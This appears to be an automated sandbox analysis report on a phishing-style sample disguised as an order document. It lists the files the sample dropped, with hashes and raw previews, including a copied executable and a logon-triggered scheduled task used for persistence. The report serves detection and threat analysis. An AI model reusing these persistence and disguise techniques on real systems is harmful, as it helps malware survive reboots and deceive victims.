                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YRtQgzFlDnVSru.exe.log

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1216
                                                                                                                                                                    Entropy (8bit):5.34331486778365
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2232
                                                                                                                                                                    Entropy (8bit):5.380192968514367
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:+LHyIFKL3IZ2KRH9Oug8s
                                                                                                                                                                    MD5:E3EC01FAB7E327602A9550342FA73464
                                                                                                                                                                    SHA1:7F06C78BA2496A8DDB3DDCD63BAF741CB8C84886
                                                                                                                                                                    SHA-256:4ECCD285FCD821659092ADB47638B559656F97512183BA76AEE2760D531273C5
                                                                                                                                                                    SHA-512:B66B707510DE1B0AA29F65F1C99BDEEBDC4D34EC3D9950B62E17058D2E5B1599C85A09EC056F1C4BCE019213485F1E3D7E9D68651890A853819F98DBF2492407
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5rm2pazz.kpc.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1mupjzu.b0n.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edvsjmjb.nz5.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxcs1oqj.alm.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvhbkkgn.e21.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uch0xsgz.dci.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uelwio5l.2gl.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wp0w0qcj.g1d.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp15E7.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1608
                                                                                                                                                                    Entropy (8bit):5.132036104753838
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt/2xvn:cgeHgYrFdOFzOzN33ODOiDdKrsuT/6v
                                                                                                                                                                    MD5:C984BEFE498CDADCCDC15ABA7BC8B66A
                                                                                                                                                                    SHA1:23BB5ADCD1F9D71C4F3005E3ECBAD80464D31F9C
                                                                                                                                                                    SHA-256:2B73D1DC70BFCF7C57D8E980F87778B21398C9A8EAB72FB0F54C8967FEEBD0D4
                                                                                                                                                                    SHA-512:3E54670FDC5D5253A2DDBFB43FC5E6223E5122C6F46AB22BB9FBA93C1DC6729ED5BC9D481EF99107494321B3DA39176BA40FC2636A4F7460222EE90C04949364
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpE707.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1608
                                                                                                                                                                    Entropy (8bit):5.132036104753838
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt/2xvn:cgeHgYrFdOFzOzN33ODOiDdKrsuT/6v
                                                                                                                                                                    MD5:C984BEFE498CDADCCDC15ABA7BC8B66A
                                                                                                                                                                    SHA1:23BB5ADCD1F9D71C4F3005E3ECBAD80464D31F9C
                                                                                                                                                                    SHA-256:2B73D1DC70BFCF7C57D8E980F87778B21398C9A8EAB72FB0F54C8967FEEBD0D4
                                                                                                                                                                    SHA-512:3E54670FDC5D5253A2DDBFB43FC5E6223E5122C6F46AB22BB9FBA93C1DC6729ED5BC9D481EF99107494321B3DA39176BA40FC2636A4F7460222EE90C04949364
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

                                                                                                                                                                    C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1432064
                                                                                                                                                                    Entropy (8bit):7.884290221622837
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:y1zGUxjCMfFrJirFpgEZR4IGqiHVtAgjSN9/pggC0gPAMhCKqX:0L/9QrF/ZR4DH4/begC0WAfZ
                                                                                                                                                                    MD5:06C13587E9A7AF60860CB6E2C4F3A7B2
                                                                                                                                                                    SHA1:238F5DDCD0193ABA7B760B7AB6F3F982D73383B5
                                                                                                                                                                    SHA-256:EFD64C0B88BBE45461D13B2A0ACD9544218F819F4579AF35B5FC92E20D5F6FA5
                                                                                                                                                                    SHA-512:B9254B49E477E7D60F077EC17EA2DEE374D06C6AC095F1B70797D56FA523729B2F23CF9C5810972C515EA7D4D15923314B93DA8B50A2AAF494D6133474CB6C8E
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\.................0.............n.... ........@.. .......................@............@.....................................O........*................... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc....*.......,..................@..@.reloc....... ......................@..B................P.......H.......h....................M.............................................l.....].f.2.....$4.l:....4.V%.Ma.V......Du.. ....A..... |..x.},..T$..`+r.6Y"..w.5.........W.P@....+.!..D..Vlc*0IF0..ef.}..<.9.e.[>j..P0....V.>:{.B......%...c@.9b.kf.Y...R.....Ia|.CU.W8+.kS.*.C.0&h%j'...(,.i"j.O$......<.=..OZ....(.W...j.2. .....G.Q:Gn.Je...Pnvey!h..U..I....k.J.d...!j....../.9.......'+.M....NE <._`...vQ.D..\.>.F...I.|.3..."A...1...S...ym.. "r.('..t.........j..r.\h;6q.

                                                                                                                                                                    C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exe:Zone.Identifier

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                    C:\Users\user\AppData\Roaming\f1a1dcf99c90d829.bin

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):12320
                                                                                                                                                                    Entropy (8bit):7.9868677280959055
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:eeneNWE0RTZ1NK0qQ86KX1MYKsJmvBoDYN:Dn4ART3NdI6KXRmvBJ
                                                                                                                                                                    MD5:F8E8BF36549FC3A571B072799A02E8A2
                                                                                                                                                                    SHA1:C66717DADD780D29AA0924E69F1B5F939179C5F2
                                                                                                                                                                    SHA-256:96C21A8736C0C23721E055FA26B9DD19C07AFECA4C758B2F890550F3DA43ACA7
                                                                                                                                                                    SHA-512:7518139933AA29F29DAF84C5839012FFED9B7F44471FA2E8F78E84A40B5A1D71217BFA722F45FA0F52554BAFF0D25FA9519E32A267C9A77621DFF619E72A4BBB
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:..d.B7..6.&.%...U.W;.A...s.K.L.w....QhC..t*.;)Q_...|....:...g.1...N&[H;.];.=.M.v2.B^.M......2|......H;..V....x./.....<....> NC.p[......2.4.....R=W......o.......\K.....y.Q.{.W...}....$#."..H.x......L...&e.K.q..>}.*..l^..J..y)5....&FM3.)2j.q`...qt..1...4....~.^.D....U'.G$.)..x...JX.R....l.nJ.~..8...e\.n~.R.....9J....z.cp.n.E..A.>.._W.Et7.....k..x......_.......%i.....H...yE.b..u.7...).'.I..m...X.z.?*.......xX.......;.6...e..1~w....g.....r9^;hss......C.V...]........wv.....=2.`9.` ....n..C......C._...}.m..}....O.G.\..O:\..|......E.7V&...D..G.....1...W3.Vf.%.J.4.x...Z..a....<..Y/....!.l.[..c... 03.m.......,...b.!h@}\wj..Y.6.\..z.....`z.E...pB...b.w.+.cg.Q..l....Yba...T...l..G...W.}K...+.Kgnp..s..b\Ng^C..........v.Q4>.;.&..xs9R.!V{HL..U..}..MW......aV...S.w.@.0.V!.Q.....XQ.2....?..O..b..l..3.....><.T........3...&H.wW3....2...g.e....y,zZ..M...KG..(.,.s\v=..UX.n......0V.....-.-.....|.Q..]..W_....&..H..R.).tR..zf.9.W.{...-.y.J......>6U^#..^m.J..

                                                                                                                                                                    C:\Windows\DtcInstall.log

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):2313
                                                                                                                                                                    Entropy (8bit):5.140649080370946
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786n:Z070s0Y0q0mF7Dm5g
                                                                                                                                                                    MD5:CE2E062A75DF6B552BD792CF52264FD0
                                                                                                                                                                    SHA1:ED61E3499CA9469291491F98FE9AA79DB51E2F32
                                                                                                                                                                    SHA-256:B3060932AA321586168268C28AACB7688CEBFF2B711F20185934CDA11CD75C71
                                                                                                                                                                    SHA-512:2A69CB50B64FD9B6EEFF26318450909D125B17E30DE9B0BA88575E230A8871FE06B3C6B1DC0E442A7414939B08C8A8D205DC926C5672ECB386737EF8E7717A9E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy

                                                                                                                                                                    C:\Windows\Logs\WindowsBackup\WBEngine.0.etl

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\wbengine.exe
                                                                                                                                                                    File Type:dBase III DBT, version number 0, next free block index 10240, 1st item "\212\276<V"
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                    Entropy (8bit):0.6154529736156096
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:Rzt/PwUTIBQjfLYreaHT9TPHkzs9zsHzzbFPR://Pw3bhT9TfCPR
                                                                                                                                                                    MD5:AD8EE3E549E980E1346A838F158B2215
                                                                                                                                                                    SHA1:5359715C4CB2B8C22E25DB7B4DB1F09034BD35F2
                                                                                                                                                                    SHA-256:A8D41B8EAC60FA36CCC708DF7E8922D5E82740D2CAFBFCAC936E02BA68F37224
                                                                                                                                                                    SHA-512:AAD26E1AAC67C8E657B51011C9305D6F595DD54E546A13C9045A797E82419A480765B4A2E4F97A8283C6ED2B45EBA073E4F2778B2ACD4431E7A32FA84BE9B2CA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:.(..@...@...........................................!...........................,.........<V.............(......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@...`...........+5..A..........W.B.E.n.g.i.n.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.W.i.n.d.o.w.s.B.a.c.k.u.p.\.W.B.E.n.g.i.n.e...0...e.t.l...........P.P.,.........<V................................................................8.B...<V....19041.1.amd64fre.vb_release.191206-1406.....,.@...<V...............'"a.-....spp.pdb...........@...<V.....T.c..i.\.C.s"8@....vssvc.pdb......./.@...<V....W.p.D.......]....vssapi.pdb......-.@...<V.....\..Q....T*&.......udfs.pdb........0.@...<V......B..,`..9..4.....ifsutil.pdb.....-.@...<V....I:...S%9.`...'.R....uudf.pdb........1.@...<V...........1$OI"......wbengine.pdb................................

